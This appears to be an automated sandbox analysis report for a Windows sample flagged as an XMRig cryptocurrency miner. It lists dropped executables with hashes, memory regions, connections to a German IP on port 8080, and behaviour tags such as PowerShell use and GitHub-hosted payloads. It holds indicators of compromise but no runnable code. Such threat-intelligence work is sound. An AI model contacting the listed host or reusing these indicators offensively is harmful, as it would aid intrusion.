C:\Windows\System\qfoQCKG.exe

C:\Windows\System\GRuOqnH.exe

C:\Windows\System\GRuOqnH.exe

C:\Windows\System\qwhosiO.exe

C:\Windows\System\qwhosiO.exe

C:\Windows\System\oKIWeeR.exe

C:\Windows\System\oKIWeeR.exe

C:\Windows\System\cmZlkqS.exe

C:\Windows\System\cmZlkqS.exe

C:\Windows\System\MasyJUq.exe

C:\Windows\System\MasyJUq.exe

C:\Windows\System\xKFzznW.exe

C:\Windows\System\xKFzznW.exe

C:\Windows\System\JbTruOy.exe

C:\Windows\System\JbTruOy.exe

C:\Windows\System\RypTCSO.exe

C:\Windows\System\RypTCSO.exe

C:\Windows\System\KWpsoOh.exe

C:\Windows\System\KWpsoOh.exe

C:\Windows\System\SCEbEgo.exe

C:\Windows\System\SCEbEgo.exe

C:\Windows\System\QCBKbPk.exe

C:\Windows\System\QCBKbPk.exe

C:\Windows\System\pkfBPLc.exe

C:\Windows\System\pkfBPLc.exe

C:\Windows\System\tduQdep.exe

C:\Windows\System\tduQdep.exe

C:\Windows\System\eManwal.exe

C:\Windows\System\eManwal.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp

Files

memory/2356-1-0x000000013FA80000-0x000000013FE76000-memory.dmp

memory/2356-0-0x00000000003F0000-0x0000000000400000-memory.dmp

\Windows\system\LlqKjMW.exe

MD5 bbdb7b34ed50d56b8374407fdd47475a
SHA1 762011dc420ef17d87574f96f5c94eaaf17847cb
SHA256 0c1e4ed3615efa95b844050a618e45517b52efa631a08c15703ea24c7cea631d
SHA512 30c687d4e2d997eef59e479064bfbd728eec158ba3bd4ae92d8c7f44162a5f8c26714e6cc5e168bb3d43e2539cd787def49a16827b5b6ca6d2f330c4fe36f93b

C:\Windows\system\YxfdizT.exe

MD5 54e024f3c51353ae56dc77971f54e02d
SHA1 c4349545f483c80316d400ca6da8a7055ccd31f6
SHA256 8eb682aef70587d50d985c54ab9eac113b44057ceb45a858254e5de327d0c0f8
SHA512 565be84b1602cb12a5891fd29f4cc6e9b994993c21402cdc7778a02f0d7c641cdf636b7879eda37f0b24d12cdc1c9a314c8a177c03881196cc3404cfd8919357

C:\Windows\system\mAPeyGv.exe

MD5 5d6d1d102f77b804f1fcc008b8cc4d77
SHA1 85bb657262d9ab3427ec5fca89dc28303b359a77
SHA256 18fef589dca0005910f331fc2d0c854baa990052331332b0c4b9d726ed825d63
SHA512 b3f8793d0a24585c249ee384b671d77aff0605aa3799885443483c4f6e7ea23b8d9b687eb5fa8967dc1a5b4b788713ac8f17857d3a78a39afe993726816b0215

\Windows\system\CqmuYOt.exe

MD5 1793a041a632b116eba87d0fc2c8dc04
SHA1 fd37debdc3e3be31392cdd306c2c2ba490942fa4
SHA256 d5c0c572e65f4bb3943af915ab72c7b55c14365abaf0a2fee857582180a3ee8e
SHA512 8e6574a6f00b1818a94ef4c9d01304eab0570f2bacdb7f8ac0e522b36736a2c548ec6951fa615a4a749009b7355a1c7bf6d04bce0fba65fcd51b2324b10744d8

C:\Windows\system\xpSnzVh.exe

MD5 8383b0f1b99f8989f0d00551faf72afb
SHA1 bb4fd7fe8d12d9662e21a38094ce95a47cdab9a4
SHA256 38a086e8104f555851b089986b39d4b9c575f85e102d07a1adcde70ea3d978af
SHA512 9ba8ba813cc427a80f1cfb1ee00bdcd4afb7a9225835cffd77d9494b6b68d88e80ea627546ea706aa9197f91a8576a19096232042e0a8310eb1989629e8c2dfd

\Windows\system\jIpWIOQ.exe

MD5 2c03a442d70341d16f53c7d353d8a6db
SHA1 cefc8088958c975ca4599700963d58dcbf9b3ad9
SHA256 41f5b07bdd70f387966e634acc936fd0c7f2835fb43c88ccae69f16fcaf6b3f9
SHA512 a32f0e9f4d12c9615d40313d5a3c4c1afb7d4219589eb13883a8f8b1ad7d65ff677243e727e3c2d3aa6fac4bb7f352c77e93c902fcdcdeb3d65ebc5b3469d9f7

C:\Windows\system\aRdLAWV.exe

MD5 352cad268f9655bc8de5578da452bb99
SHA1 f500dd0e8b9906db746fe744173f68962449209a
SHA256 31cc17b9dd6f0f8cd265674725b701c1019c90bfb64aa25057d11ab40d5c318b
SHA512 f56fe552477d8c4c94b15159507c1a95a834f01b72feeaa5f320e7b8d19e4cc60989c2218784af6702951bb47020df969f6a2c84c41e7aa52e7e0434a8198921

\Windows\system\lPinlgR.exe

MD5 07d34b4d1a6b4d7348159f89b83e1898
SHA1 c2acf7709fab735d9af6729c787389f610adba6b
SHA256 8d3ab797fe9f584e25139cb438b2bf4b7ab4766bf31f157c79846703345d93bc
SHA512 0e5898056349b2ae1bf31b06b7ceb7051ce38f324c4b2b8493b51317936b61681851d6fdd93e30a238a0cd668e2fcb8d2a6b7aa13b89839278a7c776333460d2

C:\Windows\system\KkKcEWF.exe

MD5 5877b97f9c24dc31d1e047b3365c2641
SHA1 726c327262bf48943feccf8292eaae4631df5306
SHA256 f0f4db4128360460929d2ef7442fa5f50fb8d9f0a946bd6ba09f563dbbd5d593
SHA512 ab8c246785d8dea9f9fbe3264af87ced954cc5423a3c84ac219209cf2058838d3487d25f57e6e505b08b6f733b68c1c628e69de80f01d4e8b53d51497abd1d31

memory/804-87-0x0000000001D80000-0x0000000001D88000-memory.dmp

C:\Windows\system\gyBVRSz.exe

MD5 7958d8d51900da6f7700cfcb35a5d51d
SHA1 2c545cb81b916169caa3fae0049b1e7a6a1d0c1d
SHA256 5d1a156ab8732b73764a3be9ee815645b2772a7c073c997c6661d3954dfdd297
SHA512 8588ae2bc8328b4d5c3d1ea5fe25c4b43a47d6e6d55778da91b7817b20f840308486bab5b69f912f40f8464fa13aaf9077a08c63688026d61715f90da3d4f35d

memory/804-81-0x000000001B660000-0x000000001B942000-memory.dmp

C:\Windows\system\eebjxNd.exe

MD5 dc128f2a2194f709cd92227672394f50
SHA1 08f8e4757f4828b9088622f2911ce8557ec00c5e
SHA256 c452bb59e8366efd85e1d7071cea8fb9a6254973aa6041893e4a4132cb881464
SHA512 4ad2b59f7481f622c33ec1fea631cdddd4db02b30b8860773e43af9063a9ef16d2652badc0747d69af05d5e11aded3a1bc8b92ead22382c7b45c261b6279cac2

C:\Windows\system\kUGFVWr.exe

MD5 dc6f2685e1ed3991d9df99dc492a92a6
SHA1 77547ee84d19d190aefae7951a3f5c356c8dcc60
SHA256 38ee1443f9e415c18e6acd3215b8922d68fa842d7431a395a4c777d5d6aa4c56
SHA512 521212f6ce0113c574dd7401d6600157d473f59c883761037fe5e767e56a60e176888825a862090a01ca25ef1b5f77ccc0fa2d09fd74c779193d8ea1081a0e5a

C:\Windows\system\OWshedB.exe

MD5 7c0379ee839b96cc393e1a2b75fa453e
SHA1 aa9c48ffbeabce630d3e1bebbb29cf33eb1c99a7
SHA256 256629119a46a9ff0a51c52a01cf95d6d7203aadd0072a0ecbb1a1331d314d78
SHA512 068489217077ca14cc95cc99e260721b065fe9dbc9ec823a78328e2bc7c56a0f85b2586624e7cf2e403f8cada9519cf00b60bb236cadf9aa2af2f8bd58ca0614

\Windows\system\bChjwQt.exe

MD5 9b29e71afb2dbca08272fb560cdacbe5
SHA1 3682baba18ee7fe3790e9b20bbde78ada03dfee5
SHA256 6f95b4b4c1f0ea037aeafaeb8c31375c083000a2f166ea0312fb9c320d2b02e0
SHA512 46e1d1e859c7efa0c8fcedefc8c0753922fe90d770d7dfafdd54b37a9e99443c3bb2111e8437a1d8ca593d0dd932681323dd1af446d3371858f0bad5de62a9c7

\Windows\system\TyAHvvX.exe

MD5 ac35ab754c6b5e250b52fb2f9635840f
SHA1 cd51333b862d9265b0f851fd6cb226c76f559d3f
SHA256 6c3bb60d48f06af3c2c9615432cf4992487a44016cf2d3c0b08919be283c1e6d
SHA512 c290505db5c7a24937fc044122f896687abb1eedf0dfa1c9d07108b1daf1bb33ff4ae777f3ab848348c638abe6ea34dbc89ea7cac3dc5410dd2d86bc5c233080

memory/2356-107-0x0000000003890000-0x0000000003C86000-memory.dmp

memory/2356-109-0x0000000003890000-0x0000000003C86000-memory.dmp

memory/2356-110-0x0000000003890000-0x0000000003C86000-memory.dmp

memory/2524-111-0x000000013F800000-0x000000013FBF6000-memory.dmp

memory/2564-108-0x000000013F6E0000-0x000000013FAD6000-memory.dmp

memory/2616-106-0x000000013F1D0000-0x000000013F5C6000-memory.dmp

C:\Windows\system\woimUer.exe

MD5 9f8d7c20e75cb1225d19400ce08622c2
SHA1 02dcf42369d31f43771b9464eaadb94b200713e6
SHA256 5a05b9744f400a80cfaa76c7523d8aebd1bcd3fd5bc6d11ecd13d86b216e70ac
SHA512 efc06358f8246326810e8f4250c1c28bde1aa5bc34c5b6c86685521767deb7f66f87617b9d11e3d4951b2e8ea725a8cb9eceac4fe3ee8972b89d20460042e7d5

memory/2356-95-0x000000013F020000-0x000000013F416000-memory.dmp

memory/2012-96-0x000000013FCA0000-0x0000000140096000-memory.dmp

C:\Windows\system\HKvGVLD.exe

MD5 ffbe5eb7c7a6447ce43a859d08e31efa
SHA1 7f491fdb1ee3267948ce0d04573a693e96a5067b
SHA256 a2a4d5468942cca0ac13120ca347a86ef9b969144b92377fe7475823ebbab9c6
SHA512 d1de48a2fbcf8e8243061a4d502628d449aaf1d8898fd9ca7a9bd7d514785e513f36f140cd2f4cc571399922ec21734fcbf633e3249f57908016e7b8d3292c09

memory/2356-116-0x000000013F330000-0x000000013F726000-memory.dmp

memory/2648-91-0x000000013F8B0000-0x000000013FCA6000-memory.dmp

C:\Windows\system\IbmqqGg.exe

MD5 51643b64654dad5990da5deade6cf5f4
SHA1 51ba30b90f35475907fef075b641422b22f56692
SHA256 46ccacbd5ed6701dd42643aed4586d5014ab5bbbf0214774cfdbd21b0aa39f44
SHA512 427e4c245a3edff18763070311b90649f6fb55cfc18e151911dba7348d247c85bec5e06c75b410a0ab219e46666e35fc93857ea4bd4c182c943a64dee5702408

C:\Windows\system\aZDDHpW.exe

MD5 62a0bf81fbf5bfdd450953bd597529ab
SHA1 7ea0b3adcc28c5b8ee68aaa73b39e21bf631414a
SHA256 b651a29f39b45a022506e23c06fe057f587f9f7451470169c17dd32f3d1f9a4a
SHA512 54e03c4389f168334de32b1f17e388fd88974cbb1931bdc4d582bd656419cfe60225760a1e293d91395c69470be3e324e8a0f84b85f37e7122ac41ff35038323

C:\Windows\system\jhmPsGZ.exe

MD5 ece679d9c4ddfb02c70d4e6ce57b51a2
SHA1 fb8e92af76386ad632466b7526485dd090c0e3e7
SHA256 6ad2b4a3b6964b3ee9ff4dadd2f40e6f30a46ab72cccdc8245f23cd30808d0a6
SHA512 f27bff051eea623e5de53eb9df0bb257690bf0f522e4ea14e26cdf25270b3d0896d4216f07eb38e81241ff1eccb589e1d6f6edf1646a70b1fc66e491988f7c24

C:\Windows\system\QspGHFu.exe

MD5 eccfc6f5692c39ecdc82e8478783ddea
SHA1 2c2193d593733a7f72337800c13dd5e0cf5e32eb
SHA256 3d5637492bcdf6775d392be9ac5b56dc2ad01fbaee01c0d2b2e3fdae7ccdaadf
SHA512 64eb488b24876eec09641292caba36c29f0e2bff9b1275e10faed86995b7fab17ae0cc708251fe3d70e095adb967b80a113b05c441bd404baeba2fab0d8fdf3a

\Windows\system\gWBuYba.exe

MD5 f5c0f305d37f4eecbe9a1fae3eaf3dc9
SHA1 6beb49b17082c3a41cef0467444d68386ac67e00
SHA256 7b07c4566f436ba9b69a3c5eb7ad1f40d46bbc48d1f6363cec5ee41e9b83acbe
SHA512 af9f7b9cb55bd3e4797d4b23b33927f49dfbebfef4aecb62ae2384bf4ee0c24b8927f4898fc5df1acc5f9664b12c92cb58c73518821b964d883efca75a7044f4

\Windows\system\aIQIMQW.exe

MD5 afb4c4e91a9afe8789a8be61a6b79e0e
SHA1 caa1d64b112135650cb0e5f6b8bea711f56b2e54
SHA256 70ca01256d1b38538763732ee4077e90679c6df37098f194083a5dd2630a0895
SHA512 339c662b0f4bdaea4f2f7f0c36181258f4efe34e028db6660341ee5d0f8636fe071d030ea039ad69790698dcc73612b479ad1f8606f5f71fdb015d44b82063f7

\Windows\system\DZFQdqC.exe

MD5 bae849403e2edb713ecae427049b24ff
SHA1 bc531b10f1fd9766635de964cd63fd28ef35375c
SHA256 62ee6294a007df8df8ae048a836d62eac92f811207c0dc750bc1ac9c1b11152c
SHA512 9f06238aff51cd0b10f5598f6464402cae5de9a29a83281be52daf377d7faae19c87ff36210220fe19808a269b88f7906a65bd16775326b5fe483e4e9698c666

\Windows\system\IKmGIZw.exe

MD5 852550e09d6b2b20727c468ffedafe14
SHA1 3aaff40afe5a1f9688925996af4d349925d4c127
SHA256 a53d34b5f899c583f651192bfe732438ceb33af51203cf090669aed78091a703
SHA512 06a17ca018d1bfbab1dc5ea002fc3dbb81ae0426e3285173295f8f5409e73aeb868fba6af0bf029ac0e42f09075ca9d1c63fcc17c1211bdf9b969aceb8d63243

\Windows\system\FtVNBcy.exe

MD5 45ddb892874a405fb51e4d836b96408a
SHA1 d02388b11716f1907e50121f94a96683c6c8a11e
SHA256 60de4b0c70a4c763772d5e715826b77a03fb5c99a98aed7d0b9984b791b7518c
SHA512 d1fe985d49fc5b2f6a78a8ac40728f62af1c04d9a1fcb6624a9b4942a7bc8bf41cdde92ead3335f82acd78c0eef240c551d3dd158eb7f7429b822335b57b8068

\Windows\system\BTNuzuT.exe

MD5 c8378d0aea3e28f0bb8e0e6af895d6fb
SHA1 d349cfe2488286070a12da8d190f2e83a1575f81
SHA256 46feb3a7f2f9a40231f7ca4031d4c7f1b629fcd8fc6ffa0d0168fe9de834beb7
SHA512 0f5876ee911ea92ec81d0b7b13ddf91191ce8bed23d152b8130a24eeaa7d6286b5f80737c9d0c96358c25f05d4ce321eb079e1c792dda8246515503768f3f908

\Windows\system\yZSIjxK.exe

MD5 1f724708491f3fe805155fb8e979acca
SHA1 e8c36745efc76ba9fe1be50eb55595cd62414dea
SHA256 35ef909791df31e47a06da1cf371b0e1ed8b74407cc25c1a300d24d4684a9625
SHA512 7263ca3cde231f4b409385fb6a2c840ce871d6c041a64fc7e2c6f9ef593e22d8a899dd703289057c950f109fb7bee3ce5b9d81c3da246cffb9995a1f8179d82c

\Windows\system\LeHznzc.exe

MD5 a117e215ed1123a2068e4d2e088e6d6d
SHA1 3b333ff7103f66201278cf02611cfe146121757c
SHA256 d6e9ef5177cd4cb1c994f02c1bc86734f7104354ba382f33b2d0b970d96f3a69
SHA512 aadbaed30c1075abfbb1cedccbbdd35474b5443d16b4e48d1931566ade22b3c29daae17f27ab91018aa10c4226491588e6207fc72cf198e40c56f1dc64ef8a45

\Windows\system\dPtXNjH.exe

MD5 2c7cb0652c7488836d063f86d7856582
SHA1 6e256eb130cbe3217042a14e564faea1e920a7fc
SHA256 acbb64ffd55e1e993c3cd1bc70011885f3fd94dc12e558f425d9f1a8e5941ae5
SHA512 9b4c363fd7eed4d75388b7f9fd5c0ffcf3931b108e71430ae69ca0513c8fba49de1fc456e5cbf2afa5707bf4147de2258ab7af929bc70d57ef45a068946dd95c

memory/2544-120-0x000000013FFC0000-0x00000001403B6000-memory.dmp

memory/2212-119-0x000000013F730000-0x000000013FB26000-memory.dmp

memory/2948-117-0x000000013F330000-0x000000013F726000-memory.dmp

memory/804-521-0x000007FEF5CE0000-0x000007FEF667D000-memory.dmp

memory/2464-115-0x000000013F9E0000-0x000000013FDD6000-memory.dmp

memory/2356-100-0x000000013F1D0000-0x000000013F5C6000-memory.dmp

memory/2472-99-0x000000013FAC0000-0x000000013FEB6000-memory.dmp

memory/3032-98-0x000000013F020000-0x000000013F416000-memory.dmp

memory/2600-97-0x000000013FDD0000-0x00000001401C6000-memory.dmp

\Windows\system\AfwsfgN.exe

MD5 95ed927c52f0f4c55a7e90ee42a251be
SHA1 a7f2590fbfde61fcc9f72789d854bf19c7cca835
SHA256 0ee2abae8b3b2f8aaa9187f52205474fa0ca7e521f06acd8acef4ffc967e6296
SHA512 dc379ed0a5bc1fe38b317785e0810fb94404200b31f4021aa8cf73497a1d7401af0727b7c59f1847005362851ceef24f56b493d8c77d2e0b78fd2a42b053139f

C:\Windows\system\gMutRvB.exe

MD5 3ac0e098f837c564a0ad0d6b8a2259c0
SHA1 26a44357d7f4c12690fff8af165942a7a0bb0ab5
SHA256 0b24f66c927efc08a8e0e1049b7b4594792218317b51b8eb6d008553d739a401
SHA512 6a8a4adbfd8ada17643c6fd5c53acc7c7d5f3cac7d7c1b7815e97fd9d978f9f2b80f3072a5d36c7cc1474b9eea5b707caa1f0bbf7835ba2a904b6a533ec5f27a

C:\Windows\system\MVDnatk.exe

MD5 beb0c6e51e06daf2c9735eea798c4b36
SHA1 bd68b8b4bbd02aa3f04cf6bbff76d427893fbb1e
SHA256 e9ed527f1ec1f92a35ef28ac3f929376a188f0ffafa473589baff3baeec6168b
SHA512 a40147caebef1de1f1b2b9d19353497d15c610b256e945edbd901a0a631ced497bebb92c51de474d7ff9806418ccee23a1e218323e5430cddff81eb80e011731

C:\Windows\system\bpXpuCF.exe

MD5 126e87e8c0e1c752154d116c32d93722
SHA1 2d198cf5fb9a64e620ae979ec8ede3b8c829bc46
SHA256 b68ddcb3b73cf5fbb724f34cdc3639033411ff0aa95b79fe69caea4ff446fbe7
SHA512 a7f1738c137977961a278a5ac625b8b8e4f5fc47373fcd8fe4db6828036090d5753906030a130f9c80a29a172eeedc46805fa8e3ae2cf9f1532693e6c0f9e593

C:\Windows\system\NRzpmRj.exe

MD5 391ea418cd4a482cd4fab0263ec55325
SHA1 74e1ced7a216e7f50858087cbd5e69398c7ee126
SHA256 790cd362d4796c1a9beef1741b7262dd4e826ddf96cbd36fab13d428fd13170e
SHA512 3f66a6058f9dd92617b1eef62a4131e28c21747a6f00b8c5444004e4240ead167e7f547c0b6e42b33f51aaf13f11222ddda2fafdd8b5dc8d983c68e8676f3004

memory/2356-90-0x0000000003890000-0x0000000003C86000-memory.dmp

memory/804-89-0x000007FEF5CE0000-0x000007FEF667D000-memory.dmp

C:\Windows\system\uVlSmoO.exe

MD5 8441169e32dd06eaceacd5a3b1d83d0a
SHA1 8fddea6b50b39fb036626f6f7535f4944d5585b3
SHA256 a9eaac09314d7c13a380fa389f4507d83cfc0ebc924a12ffca3ff2b935737436
SHA512 76f0e68844414834e302e37d0f3d38da04fbaa756d157882193328241320fd3e685c4178a97cb5eb097b2d0bc3c858e3966f09eeb074bbaf3952400e386890aa

memory/2356-124-0x0000000003890000-0x0000000003C86000-memory.dmp

memory/804-94-0x000007FEF5CE0000-0x000007FEF667D000-memory.dmp

memory/804-40-0x000007FEF5F9E000-0x000007FEF5F9F000-memory.dmp

memory/2356-39-0x0000000003890000-0x0000000003C86000-memory.dmp

memory/2356-35-0x000000013FFC0000-0x00000001403B6000-memory.dmp

C:\Windows\system\BTUQqJJ.exe

MD5 7c03d03272794037b7392423a947c058
SHA1 2f5fbbcfedbc5a80ad1d6265837fd92a459ce8fc
SHA256 ed5476ae7fa50cda535c6f553cd4e0572d3ce4a109810dd41096b615dd674941
SHA512 fb690c025f31665e8b58408b7671572969ca72ca1121e1ab5de56431218fdeecea24e29e0a436c08dfae3991c44f5476fb480f5ca45b15d19f88e7da9a413633

memory/2356-10-0x0000000003470000-0x0000000003866000-memory.dmp

memory/2648-7153-0x000000013F8B0000-0x000000013FCA6000-memory.dmp

memory/2544-7155-0x000000013FFC0000-0x00000001403B6000-memory.dmp

memory/2600-7154-0x000000013FDD0000-0x00000001401C6000-memory.dmp

memory/3032-7159-0x000000013F020000-0x000000013F416000-memory.dmp

memory/2012-7158-0x000000013FCA0000-0x0000000140096000-memory.dmp

memory/2464-7162-0x000000013F9E0000-0x000000013FDD6000-memory.dmp

memory/2616-7165-0x000000013F1D0000-0x000000013F5C6000-memory.dmp

memory/2948-7168-0x000000013F330000-0x000000013F726000-memory.dmp

memory/2472-7180-0x000000013FAC0000-0x000000013FEB6000-memory.dmp

memory/2524-7172-0x000000013F800000-0x000000013FBF6000-memory.dmp

memory/2564-7185-0x000000013F6E0000-0x000000013FAD6000-memory.dmp

memory/2356-7914-0x000000013FA80000-0x000000013FE76000-memory.dmp

memory/2356-8398-0x0000000003890000-0x0000000003C86000-memory.dmp

memory/2356-8479-0x0000000003890000-0x0000000003C86000-memory.dmp

memory/2356-8481-0x0000000003890000-0x0000000003C86000-memory.dmp

memory/2356-8487-0x0000000003890000-0x0000000003C86000-memory.dmp

memory/2356-8732-0x0000000003890000-0x0000000003C86000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-27 06:15

Reported

2024-05-27 06:17

Platform

win10v2004-20240508-en

Max time kernel

125s

Max time network

148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\LlqKjMW.exe N/A
N/A N/A C:\Windows\System\xpSnzVh.exe N/A
N/A N/A C:\Windows\System\YxfdizT.exe N/A
N/A N/A C:\Windows\System\mAPeyGv.exe N/A
N/A N/A C:\Windows\System\BTUQqJJ.exe N/A
N/A N/A C:\Windows\System\CqmuYOt.exe N/A
N/A N/A C:\Windows\System\jIpWIOQ.exe N/A
N/A N/A C:\Windows\System\OWshedB.exe N/A
N/A N/A C:\Windows\System\aRdLAWV.exe N/A
N/A N/A C:\Windows\System\lPinlgR.exe N/A
N/A N/A C:\Windows\System\woimUer.exe N/A
N/A N/A C:\Windows\System\kUGFVWr.exe N/A
N/A N/A C:\Windows\System\KkKcEWF.exe N/A
N/A N/A C:\Windows\System\eebjxNd.exe N/A
N/A N/A C:\Windows\System\gyBVRSz.exe N/A
N/A N/A C:\Windows\System\TyAHvvX.exe N/A
N/A N/A C:\Windows\System\bChjwQt.exe N/A
N/A N/A C:\Windows\System\HKvGVLD.exe N/A
N/A N/A C:\Windows\System\uVlSmoO.exe N/A
N/A N/A C:\Windows\System\dPtXNjH.exe N/A
N/A N/A C:\Windows\System\NRzpmRj.exe N/A
N/A N/A C:\Windows\System\LeHznzc.exe N/A
N/A N/A C:\Windows\System\IbmqqGg.exe N/A
N/A N/A C:\Windows\System\yZSIjxK.exe N/A
N/A N/A C:\Windows\System\aZDDHpW.exe N/A
N/A N/A C:\Windows\System\bpXpuCF.exe N/A
N/A N/A C:\Windows\System\BTNuzuT.exe N/A
N/A N/A C:\Windows\System\FtVNBcy.exe N/A
N/A N/A C:\Windows\System\jhmPsGZ.exe N/A
N/A N/A C:\Windows\System\QspGHFu.exe N/A
N/A N/A C:\Windows\System\IKmGIZw.exe N/A
N/A N/A C:\Windows\System\DZFQdqC.exe N/A
N/A N/A C:\Windows\System\MVDnatk.exe N/A
N/A N/A C:\Windows\System\aIQIMQW.exe N/A
N/A N/A C:\Windows\System\gMutRvB.exe N/A
N/A N/A C:\Windows\System\gWBuYba.exe N/A
N/A N/A C:\Windows\System\AfwsfgN.exe N/A
N/A N/A C:\Windows\System\MVowJMC.exe N/A
N/A N/A C:\Windows\System\ALsarBM.exe N/A
N/A N/A C:\Windows\System\YcuCBJw.exe N/A
N/A N/A C:\Windows\System\RDbxMZD.exe N/A
N/A N/A C:\Windows\System\nUoeDXI.exe N/A
N/A N/A C:\Windows\System\PeGyTTM.exe N/A
N/A N/A C:\Windows\System\SoNjOeE.exe N/A
N/A N/A C:\Windows\System\qvQaBAe.exe N/A
N/A N/A C:\Windows\System\HsPutQG.exe N/A
N/A N/A C:\Windows\System\hZbFCdx.exe N/A
N/A N/A C:\Windows\System\lDLgnkO.exe N/A
N/A N/A C:\Windows\System\aAgNunv.exe N/A
N/A N/A C:\Windows\System\fnCnHQN.exe N/A
N/A N/A C:\Windows\System\WImwSLW.exe N/A
N/A N/A C:\Windows\System\WkipXMl.exe N/A
N/A N/A C:\Windows\System\llWLZvv.exe N/A
N/A N/A C:\Windows\System\MWFIuEm.exe N/A
N/A N/A C:\Windows\System\AKzOFxt.exe N/A
N/A N/A C:\Windows\System\qNVRbEu.exe N/A
N/A N/A C:\Windows\System\NWOYoUs.exe N/A
N/A N/A C:\Windows\System\wrIyQAx.exe N/A
N/A N/A C:\Windows\System\cBXiPFt.exe N/A
N/A N/A C:\Windows\System\zgBezij.exe N/A
N/A N/A C:\Windows\System\FPppyfT.exe N/A
N/A N/A C:\Windows\System\PMtVLsP.exe N/A
N/A N/A C:\Windows\System\cJVLsyx.exe N/A
N/A N/A C:\Windows\System\oilzCTt.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\aIQIMQW.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\MVowJMC.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\DSknVRy.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\rsjUiJL.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\uwNTQPU.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\tXfQxln.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\jRorSbl.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\uKVYcCi.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
File created C:\Windows\System\kJejNro.exe C:\Users\Admin\AppData\Local\Temp\22278a4a9c0ad13212b975e610ef6660_NeikiAnalytics.exe N/A
